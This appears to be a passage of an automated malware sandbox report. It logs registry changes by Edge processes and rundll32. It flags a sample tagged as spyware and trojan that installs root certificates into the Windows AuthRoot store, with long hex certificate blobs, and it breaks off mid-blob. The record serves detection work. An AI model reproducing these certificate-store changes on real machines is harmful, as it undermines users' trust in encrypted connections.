Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totaltopposts.com\Total = "76"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "927"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "337330833"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cdn-tc.33across.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cdn-tc.33across.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\skipvideoads.com\Total = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "186"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{506FFF73-8B6C-44DE-9F7E-C53EC25D707C}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\vg35.xyz\ = "207"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74WP1CM3-506M-V62R-WR42-7MQP227Y2YLP}	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "328"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mcafee.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\vg35.xyz\ = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\t.dtscout.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\skipvideoads.com\Total = "19"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Tue118f55232e4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f6